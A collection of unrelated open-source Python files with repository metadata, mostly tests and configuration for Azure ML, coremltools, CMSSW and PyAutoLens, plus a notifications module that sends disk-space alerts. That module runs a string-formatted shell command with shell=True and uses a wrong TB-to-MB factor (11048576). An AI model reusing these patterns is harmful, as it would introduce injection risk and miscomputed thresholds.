func=asynctest.CoroutineMock(), # https://github.com/notion/a_sync/pull/40
return_value=mock_mesos_state,
)
)
mock_get_mesos_master.return_value = mock_master
resp = resources_utilization(request)
body = json.loads(resp.body.decode("utf-8"))
assert resp.status_int == 200
assert len(body) == 2
request.swagger_data = {
"groupings": ["region", "pool"],
"filter": ["region:non-exist", "pool:default,other"],
}
resp = resources_utilization(request)
body = json.loads(resp.body.decode("utf-8"))
assert resp.status_int == 200
assert len(body) == 0
|
ce1793f99f17588e74d5c4742edd1f05a639fb61
|
f576f0ea3725d54bd2551883901b25b863fe6688
|
/sdk/ml/azure-ai-ml/tests/internal_utils/unittests/test_cloud_environments.py
|
91975a6d6e156a4478e26037341b213fdeabc9c7
|
[
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-python-cwi",
"LGPL-2.1-or-later",
"PSF-2.0",
"LGPL-2.0-or-later",
"GPL-3.0-or-later",
"GPL-1.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"Python-2.0",
"MPL-2.0",
"LicenseRef-scancode-other-copyleft",
"HPND",
"ODbL-1.0",
"GPL-3.0-only",
"ZPL-2.1",
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
Azure/azure-sdk-for-python
|
02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c
|
c2ca191e736bb06bfbbbc9493e8325763ba990bb
|
refs/heads/main
| 2023-09-06T09:30:13.135012
| 2023-09-06T01:08:06
| 2023-09-06T01:08:06
| 4,127,088
| 4,046
| 2,755
|
MIT
| 2023-09-14T21:48:49
| 2012-04-24T16:46:12
|
Python
|
UTF-8
|
Python
| false
| false
| 6,985
|
py
|
test_cloud_environments.py
|
import os
import mock
import pytest
from mock import MagicMock, patch
from azure.ai.ml._azure_environments import (
AzureEnvironments,
EndpointURLS,
_get_azure_portal_id_from_metadata,
_get_base_url_from_metadata,
_get_cloud_details,
_get_cloud_information_from_metadata,
_get_default_cloud_name,
_get_registry_discovery_endpoint_from_metadata,
_get_storage_endpoint_from_metadata,
_set_cloud,
)
from azure.ai.ml.constants._common import ArmConstants, AZUREML_CLOUD_ENV_NAME
from azure.mgmt.core import ARMPipelineClient
def mocked_send_request_get(*args, **kwargs):
class MockResponse:
def __init__(self):
self.status_code = 201
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
return
def json(self):
return [
{
"name": "TEST_ENV",
"portal": "testportal.azure.com",
"resourceManager": "testresourcemanager.azure.com",
"authentication": {"loginEndpoint": "testdirectoryendpoint.azure.com"},
"suffixes": {"storage": "teststorageendpoint"},
},
{
"name": "TEST_ENV2",
"portal": "testportal.azure.windows.net",
"resourceManager": "testresourcemanager.azure.com",
"authentication": {"loginEndpoint": "testdirectoryendpoint.azure.com"},
"suffixes": {"storage": "teststorageendpoint"},
},
{"name": "MISCONFIGURED"},
]
return MockResponse()
@pytest.mark.unittest
@pytest.mark.core_sdk_test
class TestCloudEnvironments:
@mock.patch.dict(os.environ, {AZUREML_CLOUD_ENV_NAME: AzureEnvironments.ENV_DEFAULT}, clear=True)
def test_set_valid_cloud_details_china(self):
cloud_environment = AzureEnvironments.ENV_CHINA
_set_cloud(cloud_environment)
cloud_details = _get_cloud_information_from_metadata(cloud_environment)
assert cloud_details.get("cloud") == cloud_environment
assert "default" in str(cloud_details.get("credential_scopes"))
assert "https://management.chinacloudapi.cn" in str(cloud_details.get("credential_scopes"))
def test_set_valid_cloud_details_us_gov(self):
cloud_environment = AzureEnvironments.ENV_US_GOVERNMENT
_set_cloud(cloud_environment)
cloud_details = _get_cloud_information_from_metadata(cloud_environment)
assert cloud_details.get("cloud") == cloud_environment
assert "default" in str(cloud_details.get("credential_scopes"))
assert "https://management.usgovcloudapi.net" in str(cloud_details.get("credential_scopes"))
@mock.patch.dict(os.environ, {AZUREML_CLOUD_ENV_NAME: AzureEnvironments.ENV_DEFAULT}, clear=True)
def test_get_base_url_from_default_environment(self):
cloud_environment = None
_set_cloud(cloud_environment)
base_url = _get_base_url_from_metadata(cloud_environment)
assert "https://management.azure.com" in base_url
def test_get_base_url_from_us_gov(self):
cloud_environment = AzureEnvironments.ENV_US_GOVERNMENT
_set_cloud(cloud_environment)
base_url = _get_base_url_from_metadata(cloud_environment)
assert "https://management.usgovcloudapi.net" in base_url
def test_get_azure_portal_id_from_us_gov(self):
cloud_environment = AzureEnvironments.ENV_US_GOVERNMENT
_set_cloud(cloud_environment)
base_url = _get_azure_portal_id_from_metadata(cloud_environment)
assert "https://portal.azure.us" in base_url
def test_get_storage_endpoint_from_us_gov(self):
cloud_environment = AzureEnvironments.ENV_US_GOVERNMENT
_set_cloud(cloud_environment)
base_url = _get_storage_endpoint_from_metadata(cloud_environment)
assert "core.usgovcloudapi.net" in base_url
def test_set_invalid_cloud(self):
with pytest.raises(Exception) as e:
_set_cloud("yadadada")
assert "Unknown cloud environment supplied" in str(e)
def test_get_default_cloud(self):
with mock.patch("os.environ", {AZUREML_CLOUD_ENV_NAME: "yadadada"}):
cloud_name = _get_default_cloud_name()
assert cloud_name == "yadadada"
def test_get_registry_endpoint_from_public(self):
cloud_environment = AzureEnvironments.ENV_DEFAULT
_set_cloud(cloud_environment)
base_url = _get_registry_discovery_endpoint_from_metadata(cloud_environment)
assert "https://eastus.api.azureml.ms/" in base_url
def test_get_registry_endpoint_from_china(self):
cloud_environment = AzureEnvironments.ENV_CHINA
_set_cloud(cloud_environment)
base_url = _get_registry_discovery_endpoint_from_metadata(cloud_environment)
assert "https://chinaeast2.api.ml.azure.cn/" in base_url
def test_get_registry_endpoint_from_us_gov(self):
cloud_environment = AzureEnvironments.ENV_US_GOVERNMENT
_set_cloud(cloud_environment)
base_url = _get_registry_discovery_endpoint_from_metadata(cloud_environment)
assert "https://usgovarizona.api.ml.azure.us/" in base_url
@mock.patch.dict(os.environ, {}, clear=True)
@mock.patch("azure.mgmt.core.ARMPipelineClient.send_request", side_effect=mocked_send_request_get)
def test_get_cloud_from_arm(self, mock_arm_pipeline_client_send_request):
_set_cloud("TEST_ENV")
cloud_details = _get_cloud_information_from_metadata("TEST_ENV")
assert cloud_details.get("cloud") == "TEST_ENV"
@mock.patch.dict(os.environ, {}, clear=True)
@mock.patch("azure.mgmt.core.ARMPipelineClient.send_request", side_effect=mocked_send_request_get)
def test_all_endpointurls_used(self, mock_get):
cloud_details = _get_cloud_details("TEST_ENV")
endpoint_urls = [a for a in dir(EndpointURLS) if not a.startswith("__")]
for url in endpoint_urls:
try:
cloud_details[EndpointURLS.__dict__[url]]
except:
assert False, "Url not found: {}".format(EndpointURLS.__dict__[url])
assert True
@mock.patch.dict(os.environ, {}, clear=True)
@mock.patch("azure.mgmt.core.ARMPipelineClient.send_request", side_effect=mocked_send_request_get)
def test_metadata_registry_endpoint(self, mock_get):
cloud_details = _get_cloud_details("TEST_ENV2")
assert (
cloud_details.get(EndpointURLS.REGISTRY_DISCOVERY_ENDPOINT)
== "https://test_env2west.api.azureml.windows.net/"
)
@mock.patch.dict(os.environ, {}, clear=True)
@mock.patch("azure.mgmt.core.ARMPipelineClient.send_request", side_effect=mocked_send_request_get)
def test_arm_misconfigured(self, mock_get):
with pytest.raises(Exception) as e_info:
_set_cloud("MISCONFIGURED")
|
d53c1cbf069de48ef2f1831088c2d6720d43b3f9
|
3328540b01c313d58d98ef12ebb4a3c1f82f4bf3
|
/sfm/ui/notifications.py
|
89b966cc27d868bb766bb829af6c3d2b7f338b9f
|
[
"MIT"
] |
permissive
|
gwu-libraries/sfm-ui
|
0f342cc8555813223c048bb26beaeee123a8a319
|
d38886fb7e534973ea979caad2ab31b3904d651b
|
refs/heads/master
| 2023-08-21T16:34:31.967005
| 2023-08-10T20:51:56
| 2023-08-10T20:51:56
| 39,789,776
| 144
| 32
|
MIT
| 2023-07-05T23:25:54
| 2015-07-27T18:03:43
|
Python
|
UTF-8
|
Python
| false
| false
| 16,697
|
py
|
notifications.py
|
import logging
from datetime import date, datetime, timedelta, time
from collections import OrderedDict
from smtplib import SMTPException
from subprocess import check_output, CalledProcessError
import pytz
from itertools import chain
from django.template.loader import get_template
from django.core.mail import EmailMultiAlternatives
from django.db.models import Sum, Q
from django.conf import settings
from django.urls import reverse
from .models import User, CollectionSet, Collection, HarvestStat, Harvest
from .sched import next_run_time
from .utils import get_admin_email_addresses, get_site_url
from . import monitoring
log = logging.getLogger(__name__)
class MonitorSpace(object):
def __init__(self, volume_dir, threshold):
"""
A class for monitor free space of the special directory
:param volume_dir: the volume mounted directory, considered as the id of the record.
:param threshold: the free space threshold.
:return:
"""
# deal with the empty string
if not volume_dir:
volume_dir = 'None'
if not threshold:
threshold = '10GB'
self.space_msg_cache = {'volume_id': volume_dir, 'threshold': threshold, 'bar_color': 'progress-bar-success'}
def analysis_space(self):
"""
Getting space info from 'df -h'
"""
total_free_space = total_space = 0
res = self.run_check_cmd()
split_lines = res.split('\n')
for line in split_lines:
line_units = list(filter(None, line.split(' ')))
# the sfm-data and sfm-processing mount at sfm-data,
# we only need to count the sfm-data
if line_units:
# The following uncommented code will not work anymore, '/sfm-data' was removed and replaced by '/sfm-db-data', '/sfm-mq-data' etc
# get rid of the unit at the space,12M
# eg:['/dev/sda1', '208074M', '47203M', '150279M', '24%', '/sfm-data']
total_free_space = int(line_units[3][:-1])
total_space = int(line_units[1][:-1])
self.space_msg_cache['total_space'] = self._size_readable_fmt(total_space)
self.space_msg_cache['total_free_space'] = self._size_readable_fmt(total_free_space)
self.space_msg_cache['percentage'] = 0 if not total_space else int(
float(total_space - total_free_space) / float(total_space) * 100)
# update bar color with percentage
self.space_msg_cache['bar_color'] = self._get_bar_color(self.space_msg_cache['percentage'])
return total_free_space
def get_space_info(self):
"""
get the space info and check whether to send email
"""
self.space_msg_cache['send_email'] = False
# get the free space info
total_free_space = self.analysis_space()
# if not available info return False
if self.space_msg_cache['total_space'] == '0.0MB':
return self.space_msg_cache
# deal with the configuration
suffix = self.space_msg_cache['threshold'][-2:]
if suffix not in {'MB', 'GB', 'TB'}:
log.error("Free Space threshold %s, configure suffix error.",
self.space_msg_cache['threshold'])
return self.space_msg_cache
# get rid of the unit and deal with GB/TB, compare with MB
space_threshold = int(self.space_msg_cache['threshold'][:-2])
if suffix == 'GB':
space_threshold *= 1024
elif suffix == 'TB':
space_threshold *= 11048576
log.debug("total space %s, space threshold %s,", self.space_msg_cache['total_free_space'],
self.space_msg_cache['threshold'])
if total_free_space < space_threshold:
self.space_msg_cache['send_email'] = True
return self.space_msg_cache
def run_check_cmd(self):
cmd = "df -h -BM {volume_id} | grep -w {volume_id}".format(volume_id=self.space_msg_cache['volume_id'])
res = ''
try:
res = check_output(cmd, shell=True)
log.debug("Running %s completed.", cmd)
except CalledProcessError as e:
log.error("%s returned %s: %s", cmd, e.returncode, e.output)
return res.decode('utf-8')
@staticmethod
def _size_readable_fmt(num, suffix='B'):
for unit in ['M', 'G', 'T', 'P', 'E', 'Z']:
if abs(num) < 1024.0:
return "%3.1f%s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f%s%s" % (num, 'Y', suffix)
@staticmethod
def _get_bar_color(percentage):
if 70 <= percentage <= 80:
return 'bg-warning'
elif percentage > 80:
return 'bg-danger'
return 'bg-success'
def get_free_space():
"""
an interface to get the space info
:return: a space data list
"""
data_list = []
# get data directories info (sfm-db-data, sfm-mq-data, sfm-export-data, sfm-containers-data and sfm-collection-set-data)
data_db_monitor = MonitorSpace(settings.SFM_DB_DATA_DIR, settings.DATA_THRESHOLD_DB)
data_mq_monitor = MonitorSpace(settings.SFM_MQ_DATA_DIR, settings.DATA_THRESHOLD_MQ)
data_export_monitor = MonitorSpace(settings.SFM_EXPORT_DATA_DIR, settings.DATA_THRESHOLD_EXPORT)
data_containers_monitor = MonitorSpace(settings.SFM_CONTAINERS_DATA_DIR, settings.DATA_THRESHOLD_CONTAINERS)
data_collection_set_monitor = MonitorSpace(settings.SFM_COLLECTION_SET_DATA_DIR, settings.DATA_THRESHOLD_COLLECTION_SET)
data_list.append(data_db_monitor.get_space_info())
data_list.append(data_mq_monitor.get_space_info())
data_list.append(data_export_monitor.get_space_info())
data_list.append(data_containers_monitor.get_space_info())
data_list.append(data_collection_set_monitor.get_space_info())
if is_shared():
data_shared_monitor = MonitorSpace(settings.SFM_SHARED_DIR, settings.DATA_THRESHOLD_SHARED)
data_list.append(data_shared_monitor.get_space_info())
# get sfm-processing info
processing_monitor = MonitorSpace(settings.SFM_PROCESSING_DIR, settings.PROCESSING_THRESHOLD)
data_list.append(processing_monitor.get_space_info())
return data_list
def send_free_space_emails():
log.info("Sending free space emails")
msg_cache = {
# get the space mem
'space_data': get_free_space()
}
if _should_send_space_email(msg_cache):
email_addresses = get_admin_email_addresses()
for email_address in email_addresses:
msg = _create_space_email(email_address, msg_cache)
try:
log.debug("Sending email to %s: %s", msg.to, msg.subject)
msg.send()
except SMTPException as ex:
log.error("Error sending email: %s", ex)
except IOError as ex:
log.error("Error sending email: %s", ex)
def _should_send_space_email(msg_cache):
# if any volume need send email, return true
return any(msg['send_email'] for msg in msg_cache['space_data'])
def _create_space_email(email_address, msg_cache):
text_template = get_template('email/free_space_email.txt')
html_template = get_template('email/free_space_email.html')
msg_cache["url"] = _create_url(reverse('home'))
d = msg_cache
msg = EmailMultiAlternatives("[WARNING] Low free space on SFM server",
text_template.render(d), settings.EMAIL_FROM, [email_address])
msg.attach_alternative(html_template.render(d), "text/html")
return msg
def get_queue_data():
queue_threshold_map = settings.QUEUE_LENGTH_THRESHOLD
queue_threshold_other = settings.QUEUE_LENGTH_THRESHOLD_OTHER
return get_warn_queue(queue_threshold_map, queue_threshold_other)
def get_warn_queue(q_th_map, q_th_other):
hqs, eqs, uqs = monitoring.monitor_queues()
# filter any msg count larger than the threshold
return list(filter(lambda x: x[1] >= int(q_th_map[x[0]] if x[0] in q_th_map else q_th_other),
chain(hqs.items(), eqs.items(), uqs.items())))
def send_queue_warn_emails():
log.info("Sending queue length warning emails")
# get queue data and determine whether to send email
msg_cache = {
'queue_data': get_queue_data()
}
if len(msg_cache['queue_data']):
email_addresses = get_admin_email_addresses()
for email_address in email_addresses:
msg = _create_queue_warn_email(email_address, msg_cache)
try:
log.debug("Sending email to %s: %s", msg.to, msg.subject)
msg.send()
except SMTPException as ex:
log.error("Error sending email: %s", ex)
except IOError as ex:
log.error("Error sending email: %s", ex)
def _create_queue_warn_email(email_address, msg_cache):
text_template = get_template('email/queue_length_email.txt')
html_template = get_template('email/queue_length_email.html')
msg_cache["url"] = _create_url(reverse('home'))
msg_cache["monitor_url"] = _create_url(reverse('monitor'))
d = msg_cache
msg = EmailMultiAlternatives("[WARNING] Long message queue on SFM server",
text_template.render(d), settings.EMAIL_FROM, [email_address])
msg.attach_alternative(html_template.render(d), "text/html")
return msg
def send_user_harvest_emails(users=None):
log.info("Sending user harvest emails")
collection_set_cache = {}
if users is None:
users = User.objects.all()
for user in users:
if _should_send_email(user):
msg = _create_email(user, collection_set_cache)
try:
log.debug("Sending email to %s: %s", msg.to, msg.subject)
msg.send()
except SMTPException as ex:
log.error("Error sending email: %s", ex)
except IOError as ex:
log.error("Error sending email: %s", ex)
else:
log.debug("Not sending email to %s", user.username)
def _should_send_email(user, today=None):
if today is None:
today = date.today()
send_email = False
has_active_collections = Collection.objects.filter(collection_set__group__in=user.groups.all(),
is_on=True).exists()
if user.email and has_active_collections:
if user.email_frequency == User.DAILY:
send_email = True
elif user.email_frequency == User.MONTHLY and today.day == 1:
send_email = True
elif user.email_frequency == User.WEEKLY and today.weekday() == 6:
send_email = True
return send_email
def _create_email(user, collection_set_cache):
text_template = get_template('email/user_harvest_email.txt')
html_template = get_template('email/user_harvest_email.html')
d = _create_context(user, collection_set_cache)
msg = EmailMultiAlternatives("Update on your Social Feed Manager harvests", text_template.render(d),
settings.EMAIL_FROM, [user.email])
msg.attach_alternative(html_template.render(d), "text/html")
return msg
def _create_context(user, collection_set_cache):
# Start and end are datetimes. The range is inclusive.
today = datetime.utcnow().date()
# Yesterday
yesterday = today + timedelta(days=-1)
yesterday_start = datetime.combine(yesterday,
time(time.min.hour, time.min.minute, time.min.second, tzinfo=pytz.utc))
yesterday_end = datetime.combine(yesterday, time(time.max.hour, time.max.minute, time.max.second, tzinfo=pytz.utc))
# Previous day
prev_day_start = yesterday_start + timedelta(days=-1)
prev_day_end = yesterday_end + timedelta(days=-1)
last_7_start = yesterday_start + timedelta(days=-6)
last_7_end = yesterday_end
prev_7_start = last_7_start + timedelta(days=-7)
prev_7_end = yesterday_end + timedelta(days=-7)
last_30_start = yesterday_start + timedelta(days=-29)
last_30_end = yesterday_end
prev_30_start = last_30_start + timedelta(days=-30)
prev_30_end = last_30_end + timedelta(days=-30)
time_ranges = (
('yesterday', yesterday_start, yesterday_end),
('prev_day', prev_day_start, prev_day_end),
('last_7', last_7_start, last_7_end),
('prev_7', prev_7_start, prev_7_end),
('last_30', last_30_start, last_30_end),
('prev_30', prev_30_start, prev_30_end)
)
c = {
"url": _create_url(reverse('home'))
}
# Ordered list of collection sets
collection_sets = OrderedDict()
for collection_set in CollectionSet.objects.filter(group__in=user.groups.all()).filter(
collections__is_active=True).order_by('name'):
# Using a cache to avoid regenerating the data repeatedly.
if collection_set in collection_set_cache:
collections = collection_set_cache[collection_set]
else:
collections = OrderedDict()
for collection in Collection.objects.filter(collection_set=collection_set).filter(is_active=True).order_by(
'name'):
collection_info = {
"url": _create_url(reverse('collection_detail', args=(collection.id,)))
}
if collection.is_on:
collection_info['next_run_time'] = next_run_time(collection.id)
stats = {}
for name, range_start, range_end in time_ranges:
_add_stats(stats, name, collection, range_start, range_end)
for name, range_start, range_end in time_ranges:
_update_stats_for_na(stats, name, collection, range_start, range_end)
collection_info['stats'] = stats
collections[collection] = collection_info
collection_set_cache[collection_set] = collections
collection_sets[collection_set] = {
"collections": collections,
"url": _create_url(reverse('collection_set_detail', args=(collection_set.id,)))
}
c['collection_sets'] = collection_sets
return c
def _add_stats(stats, name, collection, range_start, range_end):
result_set = HarvestStat.objects.filter(harvest__collection=collection,
harvest_date__gte=range_start.date(),
harvest_date__lte=range_end.date()).values(
'item').annotate(count=Sum('count'))
for result in result_set:
item = result['item']
if item not in stats:
stats[item] = {
'yesterday': 0,
'prev_day': 0,
'last_7': 0,
'prev_7': 0,
'last_30': 0,
'prev_30': 0
}
stats[item][name] = result['count']
def _update_stats_for_na(stats, name, collection, range_start, range_end):
for item, item_stats in stats.items():
if item != "web resource" and item_stats[name] == 0 and not _was_harvest_in_range(range_start, range_end,
collection):
item_stats[name] = "N/A"
def _was_harvest_in_range(range_start, range_end, collection):
# Harvests that have start and end (i.e., completed)
if Harvest.objects.filter(Q(collection=collection)
& Q(date_started__isnull=False)
& Q(date_ended__isnull=False)
& (Q(date_started__range=(range_start, range_end))
| Q(date_ended__range=(range_start, range_end))
| (Q(date_started__lt=range_start) & Q(date_ended__gt=range_end)))
& ~Q(harvest_type='web')).exists():
return True
# Harvests that are still running
# Using status=RUNNING to try to filter out some
if Harvest.objects.filter(Q(collection=collection)
& Q(status=Harvest.RUNNING)
& Q(date_started__isnull=False)
& Q(date_ended__isnull=True)
& Q(date_started__range=(range_start, range_end))
& ~Q(harvest_type='web')).exists():
return True
return False
def _create_url(path):
return get_site_url() + path
def is_shared():
if settings.SFM_SHARED_DIR and settings.DATA_THRESHOLD_SHARED:
return True
return False
|
04eee69145dab2ff280280cf4d1bd29b06eacffd
|
38bed8ec0229b2d42ebdb33e09930ba8ee6ba5b7
|
/references/similarity/model.py
|
f235ae11116591f6564d3ea6f41dfe58921fede3
|
[
"BSD-3-Clause",
"CC-BY-NC-4.0"
] |
permissive
|
pytorch/vision
|
10443ac1eddf7a32ecb288fe8f58e28cab2a60a1
|
1f94320d8db8d102214a7dc02c22fa65ee9ac58a
|
refs/heads/main
| 2023-09-06T03:48:02.303020
| 2023-09-04T18:25:36
| 2023-09-04T18:25:36
| 73,328,905
| 15,620
| 8,564
|
BSD-3-Clause
| 2023-09-14T17:52:49
| 2016-11-09T23:11:43
|
Python
|
UTF-8
|
Python
| false
| false
| 395
|
py
|
model.py
|
import torch.nn as nn
import torchvision.models as models
class EmbeddingNet(nn.Module):
def __init__(self, backbone=None):
super().__init__()
if backbone is None:
backbone = models.resnet50(num_classes=128)
self.backbone = backbone
def forward(self, x):
x = self.backbone(x)
x = nn.functional.normalize(x, dim=1)
return x
|
bb942c3604ce44000125f611d964dfd2e3f5ae90
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/Validation/HGCalValidation/test/python/standalone_fromRECO.py
|
92d46ceb9ae92393af702e5584d28ca18a3d35f4
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143
| 2023-08-22T20:22:40
| 2023-08-22T20:22:40
| 10,969,551
| 1,006
| 3,696
|
Apache-2.0
| 2023-09-14T19:14:28
| 2013-06-26T14:09:07
|
C++
|
UTF-8
|
Python
| false
| false
| 2,295
|
py
|
standalone_fromRECO.py
|
import FWCore.ParameterSet.Config as cms
from Configuration.Eras.Era_Phase2C17I13M9_cff import Phase2C17I13M9
process = cms.Process('HGCAL',Phase2C17I13M9)
# import of standard configurations
process.load('Configuration.StandardSequences.Services_cff')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContent_cff')
process.load('Configuration.Geometry.GeometryExtended2026D88Reco_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1)
)
# Input source
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring('file:step3.root'),
secondaryFileNames = cms.untracked.vstring()
)
process.options = cms.untracked.PSet(
SkipEvent = cms.untracked.vstring('ProductNotFound')
)
# Production Info
process.configurationMetadata = cms.untracked.PSet(
annotation = cms.untracked.string('step3 nevts:10'),
name = cms.untracked.string('Applications'),
version = cms.untracked.string('$Revision: 1.19 $')
)
process.DQMoutput = cms.OutputModule("DQMRootOutputModule",
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('DQMIO'),
filterName = cms.untracked.string('')
),
fileName = cms.untracked.string('file:step3_inDQM.root'),
outputCommands = process.DQMEventContent.outputCommands,
splitLevel = cms.untracked.int32(0)
)
# Additional output definition
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, 'auto:phase2_realistic_T21', '')
process.load("Validation.HGCalValidation.hgcalHitValidation_cfi")
process.load("Validation.HGCalValidation.hgcalHitCalibration_cfi")
process.load("Validation.HGCalValidation.caloparticlevalidation_cfi")
process.dqmoffline_step = cms.EndPath(process.hgcalHitValidation+process.hgcalHitCalibration+process.caloparticlevalidation)
process.DQMoutput_step = cms.EndPath(process.DQMoutput)
# Schedule definition
process.schedule = cms.Schedule(process.dqmoffline_step,process.DQMoutput_step)
#Setup FWK for multithreaded
process.options.numberOfThreads=cms.untracked.uint32(6)
process.options.numberOfStreams=cms.untracked.uint32(0)
# customisation of the process.
|
22f1a19edc1ccd05f73c221aa0d4ea0405299062
|
ca7a8f43442e2c6722ebaf03f0abe9a22575a130
|
/autolens/lens/mock/mock_tracer.py
|
332b302731059d9054818f42930de9c20e81a543
|
[
"MIT"
] |
permissive
|
Jammy2211/PyAutoLens
|
764f2ccdb76b54eea0b4a8f2a0ae077397fb0315
|
b31b9d7c8a55d7232695761a41383cb1cc30bd76
|
refs/heads/main
| 2023-08-23T10:07:14.015683
| 2023-08-17T15:39:49
| 2023-08-17T15:39:49
| 105,440,853
| 142
| 37
|
MIT
| 2023-09-13T14:08:23
| 2017-10-01T12:33:03
|
Python
|
UTF-8
|
Python
| false
| false
| 1,698
|
py
|
mock_tracer.py
|
class MockTracer:
def __init__(
self, traced_grid_2d_list_from=None, sparse_image_plane_grid_pg_list=None
):
self.sparse_image_plane_grid_pg_list = sparse_image_plane_grid_pg_list
self._traced_grid_2d_list_from = traced_grid_2d_list_from
def traced_grid_2d_list_from(self, grid):
return self._traced_grid_2d_list_from
class MockTracerPoint(MockTracer):
def __init__(
self,
sparse_image_plane_grid_pg_list=None,
traced_grid=None,
attribute=None,
profile=None,
magnification=None,
einstein_radius=None,
einstein_mass=None,
):
super().__init__(
sparse_image_plane_grid_pg_list=sparse_image_plane_grid_pg_list
)
self.positions = traced_grid
self.attribute = attribute
self.profile = profile
self.magnification = magnification
self.einstein_radius = einstein_radius
self.einstein_mass = einstein_mass
@property
def planes(self):
return [0, 1]
def deflections_yx_2d_from(self):
pass
def extract_attribute(self, cls, attr_name):
return [self.attribute]
def extract_profile(self, profile_name):
return self.profile
def traced_grid_2d_list_from(self, grid, plane_index_limit=None):
return [self.positions]
def magnification_2d_via_hessian_from(self, grid, deflections_func=None):
return self.magnification
def einstein_radius_from(self, grid):
return self.einstein_radius
def einstein_mass_angular_from(self, grid):
return self.einstein_mass
|
e6c1635111e5a6e05aea90dd485b31c8d07e2943
|
40195e6f86bf8620850f0c56e98eae5693e88277
|
/coremltools/converters/mil/frontend/tensorflow2/test/test_v2_load.py
|
376abf2de1e32469ad89334740d2b13d5c4f804a
|
[
"MIT",
"BSD-3-Clause"
] |
permissive
|
apple/coremltools
|
009dfa7154d34cab8edcafa618e689e407521f50
|
feed174188f7773631a3d574e1ff9889a135c986
|
refs/heads/main
| 2023-09-01T23:26:13.491955
| 2023-08-31T18:44:31
| 2023-08-31T18:44:31
| 95,862,535
| 3,742
| 705
|
BSD-3-Clause
| 2023-09-14T17:33:58
| 2017-06-30T07:39:02
|
Python
|
UTF-8
|
Python
| false
| false
| 9,970
|
py
|
test_v2_load.py
|
# Copyright (c) 2020, Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can be
# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
import os
import shutil
import tempfile
import pytest
import coremltools.converters as converter
from coremltools.converters.mil.frontend.tensorflow.test.test_load import \
frontend
from coremltools.converters.mil.frontend.tensorflow.test.testing_utils import \
get_tf_keras_io_names
from coremltools.converters.mil.input_types import TensorType
from coremltools.converters.mil.testing_reqs import backends
tf = pytest.importorskip("tensorflow", minversion="2.1.0")
class TestTf2ModelFormats:
def setup(self):
self.saved_model_dir = tempfile.mkdtemp()
_, self.model_path_h5 = tempfile.mkstemp(
suffix=".h5", prefix=self.saved_model_dir
)
def teardown(self):
if os.path.exists(self.saved_model_dir):
shutil.rmtree(self.saved_model_dir)
@pytest.mark.parametrize(
"backend",
backends,
)
def test_keras_model(self, backend):
keras_model = tf.keras.Sequential(
[tf.keras.layers.ReLU(input_shape=(4, 5), batch_size=3)]
)
input_names, output_names = get_tf_keras_io_names(keras_model)
mlmodel = converter.convert(
keras_model,
inputs=[TensorType(input_names[0], (3, 4, 5))],
outputs=["Identity"],
source=frontend,
convert_to=backend[0],
)
assert mlmodel is not None
@pytest.mark.parametrize(
"backend",
backends,
)
def test_keras_saved_model_file(self, backend):
keras_model = tf.keras.Sequential(
[
tf.keras.layers.Flatten(input_shape=(28, 28), batch_size=1),
tf.keras.layers.Dense(10, activation=tf.nn.relu),
]
)
keras_model.save(self.saved_model_dir, save_format="tf")
mlmodel = converter.convert(
self.saved_model_dir, outputs=["Identity"], source=frontend, convert_to=backend[0]
)
assert mlmodel is not None
@pytest.mark.parametrize(
"backend",
backends,
)
def test_keras_h5_file(self, backend):
keras_model = tf.keras.Sequential(
[tf.keras.layers.ReLU(input_shape=(4, 5), batch_size=3)]
)
input_names, output_names = get_tf_keras_io_names(keras_model)
keras_model.save(self.model_path_h5, save_format="h5")
mlmodel = converter.convert(
self.model_path_h5,
inputs=[TensorType(input_names[0], (3, 4, 5))],
outputs=["Identity"],
source=frontend,
convert_to=backend[0],
)
assert mlmodel is not None
@pytest.mark.parametrize(
"backend",
backends,
)
def test_keras_hdf5_file(self, backend):
keras_model = tf.keras.Sequential(
[tf.keras.layers.ReLU(input_shape=(4, 5), batch_size=3)]
)
input_names, output_names = get_tf_keras_io_names(keras_model)
keras_model.save(self.model_path_h5, save_format="h5")
mlmodel = converter.convert(
self.model_path_h5,
inputs=[TensorType(input_names[0], (3, 4, 5))],
outputs=["Identity"],
source=frontend,
convert_to=backend[0],
)
assert mlmodel is not None
@pytest.mark.parametrize(
"backend",
backends,
)
def test_concrete_function_list_from_tf_low_level_api(self, backend):
root = tf.train.Checkpoint()
root.v1 = tf.Variable(3.0)
root.v2 = tf.Variable(2.0)
root.f = tf.function(lambda x: root.v1 * root.v2 * x)
input_data = tf.constant(1.0, shape=[1, 1])
to_save = root.f.get_concrete_function(input_data)
tf.saved_model.save(root, self.saved_model_dir, to_save)
tf_model = tf.saved_model.load(self.saved_model_dir)
concrete_func = tf_model.signatures[
tf.saved_model.DEFAULT_SERVING_SIGNATURE_DEF_KEY
]
mlmodel = converter.convert(
[concrete_func], outputs=["Identity"], source=frontend, convert_to=backend[0]
)
assert mlmodel is not None
@pytest.mark.parametrize(
"backend",
backends,
)
def test_saved_model_list_from_tf_function(self, backend):
class build_model(tf.Module):
@tf.function(
input_signature=[tf.TensorSpec(shape=[3, 4, 5], dtype=tf.float32)]
)
def __call__(self, x):
return tf.nn.relu(x)
model = build_model()
tf.saved_model.save(model, self.saved_model_dir)
mlmodel = converter.convert(
self.saved_model_dir, outputs=["Identity"], source=frontend, convert_to=backend[0]
)
assert mlmodel is not None
@pytest.mark.parametrize(
"backend",
backends,
)
def test_concrete_function_list_from_tf_function(self, backend):
class build_model(tf.Module):
@tf.function(
